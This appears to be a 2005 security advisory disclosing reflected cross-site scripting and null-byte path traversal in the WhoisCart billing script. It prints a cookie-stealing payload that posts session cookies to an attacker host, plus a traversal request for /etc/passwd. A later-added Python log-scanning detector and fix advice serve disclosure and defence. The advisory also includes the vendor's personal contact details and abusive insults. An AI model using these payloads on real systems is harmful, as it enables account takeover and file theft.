whoiscartInsert.txt

2005-06-23T00:00:00
ID PACKETSTORM:38236
Type packetstorm
Reporter Elzar Stuffenbach
Modified 2005-06-23T00:00:00

Description

                                        
Subject:
Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in
two ways: it reflects attacker-supplied JavaScript into pages viewed by other users
(cross-site scripting), and it discloses the contents of any world-readable file on the
server hosting the WhoisCart software.
  
  
Severity:  
Severe. Together these flaws can give an attacker access to essentially any part of the
system: plaintext database passwords can be read from the WhoisCart configuration files,
and users' session ID cookies can be stolen and replayed to access their accounts.
  
  
Preamble:  
(Taken from http://www.whoiscart.net/)  
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and  
domains shopping cart and billing management system that will most likely be your best  
friend during your domain hosting and registration business venture. Easily skinned  
using our versatile theme architecture, with support for over a dozen payment portals,  
fourteen different languages, and capable of all billing recurrences; the system is  
quickly becoming the most popular and highest rated script in its class [1]. Coded  
entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in  
Zend's Top 10, and by far the most feature packed software for its price - come and see  
why exactly 3155 users just can't be wrong.  
  
  
Problem:  
The first vulnerability, JavaScript injection leading to session ID theft, is a reflected
cross-site scripting flaw: the value of the page parameter of profile.php is written into
the response without being HTML-encoded, so markup carried in the URL ends up in the page
the user views.
  
http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE  
  
Basically, URL-encode some HTML carrying JavaScript. The payload below copies
document.cookie into a hidden form field and submits that form to a host the attacker
controls as soon as the page has loaded (the original payload called submit() with the
cookie as an argument, which submit() ignores, so nothing would have been sent):

<body onload="document.forms.x.c.value=document.cookie;document.forms.x.submit()"><form name=x method=post action=http://yourmaliciousdomain.com/somescript><input type=hidden name=c></form></body>

turns into:

%3Cbody+onload%3D%22document.forms.x.c.value%3Ddocument.cookie%3Bdocument.forms.x.submit%28%29%22%3E%3Cform+name%3Dx+method%3Dpost+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3Cinput+type%3Dhidden+name%3Dc%3E%3C%2Fform%3E%3C%2Fbody%3E

Then that URL-encoded payload is inserted at the appropriate location above. Because the
injection is reflected, a logged-in user has to be made to open the crafted link (from an
email or a forum post, for instance); their session cookie then arrives at the attacker's
script, where it can be replayed against the user's account.
  
  
Next Problem:  
The next vulnerability discloses, as plain text, any world-readable file on the system
(including every configuration file WhoisCart uses, which hold session IDs, plaintext
database passwords, and so on). The language parameter is used unchecked to build the
path of the language file that the script reads, so a traversal sequence walks out of
the intended directory:

http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00

There you have the ability to read any world-readable file on the server. The long run of
../ is simply enough to reach the root from any install depth. The %00 appends a null
character, which truncates the path before the .php extension the script adds, so the
file opened is /etc/passwd rather than /etc/passwd.php. Two conditions apply: PHP must
pass the null byte through to the filesystem call (versions before 5.3.4 do; later
versions reject paths containing NUL), and magic_quotes_gpc must be off, since it would
escape the byte to a literal \0 and defeat the truncation.
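As an added example (not part of the advisory and not WhoisCart code), here is a small Python screen that covers both of the requests described above: it pulls the request target out of Apache-style access log lines, decodes every query parameter to raw bytes (repeating the decode so a double-encoded payload is inspected in its final form), and flags values that carry an embedded NUL, a ../ traversal step, or HTML/JavaScript markup. The log lines are constructed for the example; the two attack lines reproduce the advisory's requests, and the rule set and function names are my own.

```python
# Added example for this advisory (not WhoisCart code): flag requests that
# match the two attack patterns described above, i.e. markup injected via
# profile.php?page= and NUL-terminated path traversal via ?language=.
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache-style log lines. Lines 0 and 1 reproduce the advisory's
# two requests, line 2 is the traversal with every percent sign encoded a
# second time, lines 3 and 4 are ordinary traffic that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jun/2005:10:01:02 +0000] "GET /whoiscart/profile.php'
    '?page=%3Cbody+onload%3D%22document.forms.x.c.value%3Ddocument.cookie%3B'
    'document.forms.x.submit%28%29%22%3E%3Cform+name%3Dx+method%3Dpost+action'
    '%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3Cinput+type%3Dhidden'
    '+name%3Dc%3E%3C%2Fform%3E%3C%2Fbody%3E HTTP/1.1" 200 5120',
    '10.0.0.5 - - [22/Jun/2005:10:01:09 +0000] "GET /whoiscart/?language='
    '../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1834',
    '10.0.0.7 - - [22/Jun/2005:10:02:44 +0000] "GET /whoiscart/?language='
    '%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 200 1834',
    '10.0.0.9 - - [22/Jun/2005:10:03:00 +0000] "GET /whoiscart/?language=french'
    ' HTTP/1.1" 200 9001',
    '10.0.0.9 - - [22/Jun/2005:10:03:05 +0000] "GET /whoiscart/profile.php'
    '?page=billing&id=42 HTTP/1.1" 200 7733',
]

# Request target of a log line, e.g. /whoiscart/?language=french
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
# "<tag", an inline event handler such as onload=, or a javascript: URL
MARKUP_RE = re.compile(rb'<\s*/?\s*[a-z!?]|\bon[a-z]+\s*=|javascript\s*:', re.I)
# a ".." path component delimited by / or \ (or the start/end of the value)
TRAVERSAL_RE = re.compile(rb'(?:^|[\\/])\.\.(?:[\\/]|$)')


def decode_value(raw, rounds=3):
    """Percent-decode a query value to bytes, repeating while it keeps
    changing so %252e becomes %2e and then '.', and keeping NUL (%00) as a
    real byte rather than losing it in a text conversion."""
    data = raw.replace('+', ' ').encode('utf-8')   # '+' is a form-encoded space
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data


def parse_query(target):
    """Map parameter name -> decoded bytes for the query string of a target."""
    _, _, query = target.partition('?')
    params = {}
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params[unquote_to_bytes(name).decode('latin-1')] = decode_value(value)
    return params


def classify(value):
    """Return the set of rule names the decoded value trips (empty if clean)."""
    flags = set()
    if b'\x00' in value:
        flags.add('nul')
    if TRAVERSAL_RE.search(value):
        flags.add('traversal')
    if MARKUP_RE.search(value):
        flags.add('markup')
    return flags


def scan_log(lines):
    """(line index, parameter, sorted flags) for every parameter that trips a rule."""
    findings = []
    for index, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in parse_query(match.group(1)).items():
            flags = classify(value)
            if flags:
                findings.append((index, name, tuple(sorted(flags))))
    return findings


if __name__ == '__main__':
    for index, name, flags in scan_log(SAMPLE_LOG):
        print(f'line {index}: parameter {name!r} -> {", ".join(flags)}')
```

Run as a script it prints one line per flagged parameter; the same classify() rule can sit in front of a request handler as a pre-filter. It is a detection aid only: the real fix remains an allowlist for language and output encoding for page, since a screen like this will never enumerate every encoding an attacker can use.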
  
  
Workaround:  
Use different software, not written by a 12 year old (no offense to any kids reading
this, but think about security, for once). The vulnerabilities shown here are indicative
of a truly inferior software product. The product is not even feature complete: the beta
that has been in progress for 2 years, visible at http://beta.whoiscart.net/admin/, has
barely started. Vulnerabilities like this still exist, and have existed throughout the
software since its inception. The only real fix is for Saeven.net to release a new
product, rewritten from the ground up, or for the consumer to choose a new product
altogether (yes, there are better ones on the market for the same price, try Google). If
software allows the unauthorized viewing of globally readable files, it has already
failed, and deserves to be shot down like this.

For anyone who has to keep the current version running in the meantime, the two flaws
are closed by the usual means: check the language parameter against the fixed list of
language files that ship with the product instead of using it to build a path, and
HTML-encode the page parameter (and every other request value) before echoing it into a
page.
  
  
Vendor Contact:  
saeven.net consulting  
Alexandre Lemaire (registrations@saeven.net)  
1968 Portobello blvd  
Orleans  
Ontario,K4A 4E0  
CA  
Tel. +91.226370256 (If you call, careful you don't get his mom)  
  
  
Disclosure Timeline:  
Vendor Notified: June 21, 2005  
Public Release: June 22, 2005  
  
  
About the Author:  
The author is a software engineer with an absolute detestation of bullshit. Sometimes I
detest some languages, because they allow punks like this to write shit software, and
then the dumbass programmer puts up a website, uses the word "innovative", and ends up
ultimately screwing over a few hundred people, who maintain the personal information of
thousands of people. Identity theft starts with "companies" such as this. Choose a
trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP,
does NOT make something trustworthy. A company with a non-fictitious in-house lawyer is
a good start, and then a company who knows what the fuck they're doing when it comes to
software design and implementation is stellar.

It is this type of bullshit I detest, and I advise everyone against using this product,
for numerous reasons, all stemming from the same core element: a product is not to be
trusted because of a flashy website, or because some kid lies about his age.
  
  
Conclusion:  
Here is an email, verbatim from Mr. Lemaire:  
<quote>  
From: "S. Alexandre M. Lemaire" <saeven@saeven.net>  
I'll indulge your comments.  
  
The truth is that I don't maintain the work on whois.cart currently. I
have a staff of 13 people working for me right now, the developments are
intense and I don't have the time to monitor them as I usually would. They
package and operate independently from myself. My user community knows well
(as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk. We have a user base of 3000+, you aren't
the only one to submit bug reports - note also that the people that work for
me aren't bored teenagers. They are people with M.Scs and PhDs in computer
science and related fields, who've agreed to partake in the whois.cart
project in their spare time initially. Your concern for security is not
exclusive.
</quote>  
  
Show me a person with a Master's or PhD in Computer Science who both works in the
webhosting software industry and writes shit software like this, and I will show you
shit that smells like roses.
  
--   